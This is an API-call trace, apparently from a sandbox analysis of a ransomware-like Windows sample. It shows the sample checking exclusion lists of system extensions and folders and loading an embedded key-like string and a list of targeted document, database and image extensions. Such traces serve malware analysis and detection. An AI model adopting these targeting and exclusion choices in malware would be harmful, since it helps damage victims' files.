[0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0112.833] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0112.833] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0112.833] LockResource (hResData=0x516f58) returned 0x516f58 [0112.833] FreeResource (hResData=0x516f58) returned 0 [0112.833] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.833] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.833] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.833] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.833] FreeResource (hResData=0x50d64c) returned 0 [0112.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0112.833] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0112.833] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0112.833] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0112.834] GetCommandLineW () 